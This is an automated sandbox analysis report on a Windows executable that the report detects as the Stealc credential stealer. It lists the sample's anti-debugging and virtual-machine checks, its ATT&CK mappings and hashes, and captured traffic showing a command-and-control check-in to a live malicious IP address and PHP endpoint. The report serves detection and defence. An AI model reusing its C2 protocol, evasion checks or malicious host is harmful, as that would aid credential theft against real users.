                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F68A FindFirstFileA,0_2_00D3F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D31160 GetSystemInfo,ExitProcess,0_2_00D31160
                Source: file.exe, file.exe, 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2120585250.0000000000902000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2120585250.0000000000934000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13443
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13392
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13389
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13403
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13411
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D345C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00D345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49750 mov eax, dword ptr fs:[00000030h]0_2_00D49750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00D478E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match, File source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00D49600
                Source: file.exe, file.exe, 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 'Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00D47B90
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00D47980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00D47850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00D47A30

                Stealing of Sensitive Information

Source: Yara match, File source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR
Source: Yara match, File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match, File source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR
Source: Yara match, File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (listed per tactic; a leading number marks a technique the report matched, with the report's match count)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.php~ | file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpB | file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpr | file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/C | file.exe, 00000000.00000002.2120585250.0000000000902000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpo | file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpF | file.exe, 00000000.00000002.2120585250.0000000000934000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1526104
Start date and time: 2024-10-04 18:55:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 80
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | niko.exe | malicious | Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | niko.exe | malicious | Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.103
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | Setup.exe | malicious | RedLine | 185.215.113.22
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948017377484882
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'833'472 bytes
                            MD5:5e8286d88eeff93b753e7454a6b431fd
                            SHA1:9cd9b91b5dd298a811d922714c506581e7c27b96
                            SHA256:9c62b127d6790b9b7957057a75441bc1a4e5eaf4f5c6c2669e833154739adb00
                            SHA512:ae137bf10ad26dea6ba088903aab92dfe1a67626549adb92665f77bba791f9403f8ea49b30200663c898cb54ac96725ca29f96d233482927683812cc103f8fdf
                            SSDEEP:49152:wmr6UD38hhPKt/mY9nb5VwuUDhblam9LLV:wa64IJwV9ERxlZLh
                            TLSH:E685339B1E3721A7C4C7E57A429FE29F7CF91CA5F4B01A4C1202DD395AA3D0C376A825
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xa93000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007FC83CAD2E9Ah
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x25b000 | 0x22800 | 619932b15396eab894f4fdca7a9af7e3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x25e000 | 0x29a000 | 0x200 | c775d09d08a32b20b0107132327b150b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uygwklsw | 0x4f8000 | 0x19a000 | 0x199600 | 0f79664a9d4b7fa4831e1d5431757ab9 | False | 0.9949165076335877 | data | 7.954033280427647 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sowhbkpg | 0x692000 | 0x1000 | 0x600 | 4e2fa459a9fbb33f15899b6459d90d76 | False | 0.5611979166666666 | data | 4.913249727106167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x693000 | 0x3000 | 0x2200 | bf788d5ec35a2820a23aab1ed7d69e34 | False | 0.08168658088235294 | DOS executable (COM) | 0.8890519630107065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-04T18:56:06.423122+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 4, 2024 18:56:05.490628004 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 4, 2024 18:56:05.496113062 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 4, 2024 18:56:05.496289968 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 4, 2024 18:56:05.496467113 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 4, 2024 18:56:05.501353025 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 4, 2024 18:56:06.188127041 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 4, 2024 18:56:06.188199997 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 4, 2024 18:56:06.191490889 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 4, 2024 18:56:06.196429014 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 4, 2024 18:56:06.422909975 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 4, 2024 18:56:06.423121929 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 4, 2024 18:56:10.799527884 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                            • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 2228 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 18:56:05.496467113 CEST | 89 | OUT | GET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
Oct 4, 2024 18:56:06.188127041 CEST | 203 | IN | HTTP/1.1 200 OK
                            Date: Fri, 04 Oct 2024 16:56:06 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
Oct 4, 2024 18:56:06.191490889 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBA
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 44 45 44 30 38 33 45 39 35 30 33 30 31 32 33 34 33 35 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 2d 2d 0d 0a
Data Ascii (line breaks restored from the 0d 0a sequences above):
------DHDAFBFCFHIDAKFIIEBA
Content-Disposition: form-data; name="hwid"

22DED083E9503012343576
------DHDAFBFCFHIDAKFIIEBA
Content-Disposition: form-data; name="build"

doma
------DHDAFBFCFHIDAKFIIEBA--
Oct 4, 2024 18:56:06.422909975 CEST | 210 | IN | HTTP/1.1 200 OK
                            Date: Fri, 04 Oct 2024 16:56:06 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 of the string "block")



                            Target ID:0
                            Start time:12:56:01
                            Start date:04/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xd30000
                            File size:1'833'472 bytes
                            MD5 hash:5E8286D88EEFF93B753E7454A6B431FD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:8.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10.1%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
API calls 13873->13874 13875 d32fb0 13874->13875 13876 d345c0 2 API calls 13875->13876 13877 d32fc9 13876->13877 13878 d345c0 2 API calls 13877->13878 13879 d32fe2 13878->13879 13880 d345c0 2 API calls 13879->13880 13881 d32ffb 13880->13881 13882 d345c0 2 API calls 13881->13882 13883 d33014 13882->13883 13884 d345c0 2 API calls 13883->13884 13885 d3302d 13884->13885 13886 d345c0 2 API calls 13885->13886 13887 d33046 13886->13887 13888 d345c0 2 API calls 13887->13888 13889 d3305f 13888->13889 13890 d345c0 2 API calls 13889->13890 13891 d33078 13890->13891 13892 d345c0 2 API calls 13891->13892 13893 d33091 13892->13893 13894 d345c0 2 API calls 13893->13894 13895 d330aa 13894->13895 13896 d345c0 2 API calls 13895->13896 13897 d330c3 13896->13897 13898 d345c0 2 API calls 13897->13898 13899 d330dc 13898->13899 13900 d345c0 2 API calls 13899->13900 13901 d330f5 13900->13901 13902 d345c0 2 API calls 13901->13902 13903 d3310e 13902->13903 13904 d345c0 2 API calls 13903->13904 13905 d33127 13904->13905 13906 d345c0 2 API calls 13905->13906 13907 d33140 13906->13907 13908 d345c0 2 API calls 13907->13908 13909 d33159 13908->13909 13910 d345c0 2 API calls 13909->13910 13911 d33172 13910->13911 13912 d345c0 2 API calls 13911->13912 13913 d3318b 13912->13913 13914 d345c0 2 API calls 13913->13914 13915 d331a4 13914->13915 13916 d345c0 2 API calls 13915->13916 13917 d331bd 13916->13917 13918 d345c0 2 API calls 13917->13918 13919 d331d6 13918->13919 13920 d345c0 2 API calls 13919->13920 13921 d331ef 13920->13921 13922 d345c0 2 API calls 13921->13922 13923 d33208 13922->13923 13924 d345c0 2 API calls 13923->13924 13925 d33221 13924->13925 13926 d345c0 2 API calls 13925->13926 13927 d3323a 13926->13927 13928 d345c0 2 API calls 13927->13928 13929 d33253 13928->13929 13930 d345c0 2 API calls 13929->13930 13931 d3326c 13930->13931 13932 d345c0 2 API calls 13931->13932 13933 d33285 13932->13933 13934 d345c0 2 API calls 13933->13934 13935 d3329e 13934->13935 13936 d345c0 2 API calls 
13935->13936 13937 d332b7 13936->13937 13938 d345c0 2 API calls 13937->13938 13939 d332d0 13938->13939 13940 d345c0 2 API calls 13939->13940 13941 d332e9 13940->13941 13942 d345c0 2 API calls 13941->13942 13943 d33302 13942->13943 13944 d345c0 2 API calls 13943->13944 13945 d3331b 13944->13945 13946 d345c0 2 API calls 13945->13946 13947 d33334 13946->13947 13948 d345c0 2 API calls 13947->13948 13949 d3334d 13948->13949 13950 d345c0 2 API calls 13949->13950 13951 d33366 13950->13951 13952 d345c0 2 API calls 13951->13952 13953 d3337f 13952->13953 13954 d345c0 2 API calls 13953->13954 13955 d33398 13954->13955 13956 d345c0 2 API calls 13955->13956 13957 d333b1 13956->13957 13958 d345c0 2 API calls 13957->13958 13959 d333ca 13958->13959 13960 d345c0 2 API calls 13959->13960 13961 d333e3 13960->13961 13962 d345c0 2 API calls 13961->13962 13963 d333fc 13962->13963 13964 d345c0 2 API calls 13963->13964 13965 d33415 13964->13965 13966 d345c0 2 API calls 13965->13966 13967 d3342e 13966->13967 13968 d345c0 2 API calls 13967->13968 13969 d33447 13968->13969 13970 d345c0 2 API calls 13969->13970 13971 d33460 13970->13971 13972 d345c0 2 API calls 13971->13972 13973 d33479 13972->13973 13974 d345c0 2 API calls 13973->13974 13975 d33492 13974->13975 13976 d345c0 2 API calls 13975->13976 13977 d334ab 13976->13977 13978 d345c0 2 API calls 13977->13978 13979 d334c4 13978->13979 